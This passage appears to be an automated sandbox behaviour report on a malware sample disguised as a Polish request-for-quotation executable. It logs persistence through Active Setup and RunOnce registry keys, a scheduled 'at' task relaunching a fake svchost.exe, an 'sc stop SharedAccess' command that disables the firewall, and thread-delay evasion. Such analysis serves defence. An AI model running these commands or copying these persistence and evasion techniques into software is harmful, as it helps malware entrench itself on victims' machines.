                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\System\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                    Source: C:\Windows\System\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_004772DE
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_004375B0
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004440781_2_00444078
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe API/Special instruction interceptor: Address: 3EE0EA4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599117
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598748
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596245
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595919
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735
